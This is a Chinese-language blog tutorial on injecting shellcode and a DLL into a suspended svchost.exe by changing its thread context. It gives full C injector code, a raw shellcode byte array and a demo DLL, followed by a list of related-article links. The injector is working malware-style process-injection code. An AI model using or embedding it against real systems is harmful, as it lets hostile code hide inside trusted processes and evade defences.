本文主要利用 SetThreadContext 修改进程中的线程上下文来实现Dll注入(ShellCode)。

实现原理

  • 首先,使用 CreateProcess 函数创建svchost.exe进程,并且设置创建进程的标志为 CREATE_SUSPENDED,即表示新进程的主线程被挂起。
  • 使用 GetThreadContext,设置标志为 CONTEXT_ALL,获取新进程中所有的线程上下文。
  • 使用 ReadProcessMemory 读取目标进程的加载基址。
  • 在原来的空间中进行覆盖写入 Shellcode。
  • 最后,调用 ResumeThread 恢复主线程,让进程继续运行并执行我们的 Shellcode 代码。

EXE主程序

int main()

{

	//Dll inject shellcode, path D:\x86.dll

	unsigned char buf[] =

	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"

	"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"

	"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"

	"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"

	"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"

	"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"

	"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"

	"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"

	"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"

	"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x8d\x85\xb0"

	"\x00\x00\x00\x50\x68\x4c\x77\x26\x07\xff\xd5\xbb\xf0\xb5"

	"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"

	"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

	"\x44\x3a\x5c\x78\x38\x36\x2e\x64\x6c\x6c\x00";

	STARTUPINFOA si;

	PROCESS_INFORMATION pi;

	ZeroMemory(&si, sizeof(si));

	ZeroMemory(&pi, sizeof(pi));

	si.cb = sizeof(STARTUPINFOA);

	// 创建挂起进程

	if (!CreateProcessA(

		"C:\\windows\\sysWoW64\\svchost.exe",

		NULL,

		NULL,

		NULL,

		FALSE,

		CREATE_SUSPENDED,

		NULL,

		NULL,

		&si,

		&pi

	))

	{

		printf("CreateProcess failed (%d).\n", GetLastError());

		return 0;

	}

	// 获取线程上下文

	CONTEXT ctx = { 0 };

	ctx.ContextFlags = CONTEXT_ALL;

	if (!GetThreadContext(pi.hThread, &ctx))

	{

		printf("GetThreadContext failed (%d).\n", GetLastError());

	}

	// 拿到目标进程主线程上下文后,在Ebx寄存器中保存的就是PEB的地址,

	// 而PEB结构偏移0x8的位置是AddressOfImageBase字段,

	// 所以直接来读取ctx.Ebx+0x8,就可以获取到目标进程的加载基址

	DWORD dwImageBase = 0;

	DWORD lpNumberOfBytesRead = 0;

	if (!ReadProcessMemory(pi.hProcess, (LPCVOID)(ctx.Ebx + 0x8), &dwImageBase, sizeof(DWORD), &lpNumberOfBytesRead))

	{

		printf("ReadProcessMemory failed (%d).\n", GetLastError());

		return 0;

	}

	// 在申请的空间中写入shellcode

	DWORD NumberOfBytesWritten = 0;

	if (!WriteProcessMemory(pi.hProcess, (LPVOID)ctx.Eax, buf, sizeof(buf), &NumberOfBytesWritten))

	{

		printf("WriteProcessMemory failed (%d).\n", GetLastError());

	}

	// 恢复线程执行

	if (ResumeThread(pi.hThread) == -1)

	{

		printf("ResumeThread failed (%d).\n", GetLastError());

	}

	system("pause");

    return 0;

}

DLL程序

BOOL APIENTRY DllMain( HMODULE hModule,

                       DWORD  ul_reason_for_call,

                       LPVOID lpReserved

					 )

{

	switch (ul_reason_for_call)

	{

	case DLL_PROCESS_ATTACH:

		MessageBox(NULL, "DLL inject successful!", "Successful", NULL);

		break;

	case DLL_THREAD_ATTACH:

	case DLL_THREAD_DETACH:

	case DLL_PROCESS_DETACH:

		break;

	}

	return TRUE;

}

效果演示

创建傀儡进程svchost.exe并注入DLL文件(Shellcode)的更多相关文章

  1. Wow64(32位进程)注入DLL到64位进程

    转载自: https://blog.poxiao.me/p/wow64-process-inject-dll-into-x64-process/ 向其他进程注入DLL通常的做法是通过调用CreateR ...

  2. Windows x86/ x64 Ring3层注入Dll总结

    欢迎转载,转载请注明出处:http://www.cnblogs.com/uAreKongqi/p/6012353.html 0x00.前言 提到Dll的注入,立马能够想到的方法就有很多,比如利用远程线 ...

  3. dll文件32位64位检测工具以及Windows文件夹SysWow64的坑

    自从操作系统升级到64位以后,就要不断的需要面对32位.64位的问题.相信有很多人并不是很清楚32位程序与64位程序的区别,以及Program Files (x86),Program Files的区别 ...

  4. vs2010下C++调用lib或dll文件

    注: DLL:表示链接库,包含dll,lib文件: dll: 表示my.dll文件 lib: 表示my.lib文件 C++ 调用.lib的方法: 一: 隐式的加载时链接,有三种方法 1  设置工程的 ...

  5. dll文件32位64位检测工具以及Windows文件夹SysWow64的坑(很详细,还有自动动手编程探测dll)

    阅读目录 dll文件不匹配导致数据库无法启动 究竟是System32还是SysWow64 区分dll文件32位64位的程序让我倍感迷惑 再次判断究竟是System32还是SysWow64——意想不到的 ...

  6. dll文件32位64位检测工具以及Windows文件夹SysWow64的坑【转发】

    原文地址:http://www.cnblogs.com/hbccdf/archive/2014/03/09/3590916.html 自从操作系统升级到64位以后,就要不断的需要面对32位.64位的问 ...

  7. c++ 生成dll文件并调用-转

    .h(头文件) .lib(库文件) .dll(动态链接库文件) 之间的关系和作用的区分   .h头文件是编译时必须的,lib是链接时需要的,dll是运行时需要的. 附加依赖项的是.lib不是.dll, ...

  8. 几种工具反编译被编译好的DLL文件

    我们平时在工作中经常会遇到一些已经被编译后的DLL,而且更加麻烦是没有源代码可以进行修改,只能针对这个DLL的文件进行修改才能得到我们想要的结果:本文将通过一个实例来演示如果完成一个简单的修改;我们将 ...

  9. 如何修改被编译后DLL文件

    原文 http://www.cnblogs.com/wujy/p/3275855.html 我们平时在工作中经常会遇到一些已经被编译后的DLL,而且更加麻烦是没有源代码可以进行修改,只能针对这个DLL ...

  10. 反编译DLL文件

    我们平时在工作中经常会遇到一些已经被编译后的DLL,而且更加麻烦是没有源代码可以进行修改,只能针对这个DLL的文件进行修改才能得到我们想要的结果:本文将通过一个实例来演示如果完成一个简单的修改;我们将 ...

随机推荐

  1. 多源异构数据信息的融合方式0 - Dempster/Shafer 证据理论(D-S证据理论)

    Dempster/Shafer 证据理论(D-S证据理论)的大体内容如下: 一.简介: 在理论中,由互不相容的基本命题组成的完备集合Θ称为识别框架,表示对于某一问题的所有可能答案,但是只有一个答案是正 ...

  2. 配置虚拟主机-部署nginx代理并验证缓存生效

    1.虚拟主机的配置: 虚拟主机的作用: 虚拟主机提供了同一台服务器上运行多个网站的功能. 虚拟主机的三种模式:   1)基于域名配置虚拟主机是最常见的一种虚拟主机配置. 只需配置你的DNS服务器,将每 ...

  3. 一个类似于Gridster的栅格布局系统Vue组件

    哈喽,我是老鱼,一名致力于在技术道路上的终身学习者.实践者.分享者! Vue Grid Layout是一个类似于Gridster的栅格布局系统, 适用于Vue.js,灵感来源于React Grid L ...

  4. OI 学习笔记 I:图论(更新中)

    阅读时建议在右下角开启目录. 由于作者的数学水平限制和篇幅限制,有些结论可能仅给出感性理解或不给出证明,有疑惑的读者可以百度答案或者前往参考资料一栏查找. 另外,因为图论的内容比较杂,有些与树相关的算 ...

  5. go实现一个切片迭代器

    go实现一个简单的切片迭代器 package main import "fmt" type iterator struct { data []int index int // 索引 ...

  6. Session概述(选自WebX)

    http://openwebx.org/docs/Webx3_Guide_Book.html#d0e9084 8.1. Session概述 8.1.1. 什么是Session HTTP协议是无状态的, ...

  7. win11中无法识别STM32 BOOTLOADER的解决方法

    如图,按照PYBoard的官方手册说可以直接右键选择自动更新驱动即可.但是我在WIN11上并没有成功. 主要是原因是,DFU模式下的STM设备驱动程序没有自动安装成功. 解决方法是手动安装一下驱动: ...

  8. 2023-11-11:用go语言,字符串哈希+二分的例题。 给定长为 n 的源串 s,以及长度为 m 的模式串 p, 要求查找源串中有多少子串与模式串匹配, s‘ 与 s 匹配,当且仅当 s‘ 与 s

    2023-11-11:用go语言,字符串哈希+二分的例题. 给定长为 n 的源串 s,以及长度为 m 的模式串 p, 要求查找源串中有多少子串与模式串匹配, s' 与 s 匹配,当且仅当 s' 与 s ...

  9. canvas实现动态替换人物的背景颜色

    起因 今天遇见一个特别有意思的小功能. 就是更换人物图像的背景颜色. 大致操作步骤就是:点击人物-实现背景颜色发生变化 将图片绘画到canvas画布上 我们需要将图片绘制到canvas画布上. 这样做 ...

  10. L2-032 彩虹瓶

    #include <bits/stdc++.h> using namespace std; const int N = 1010; int main() { ios::sync_with_ ...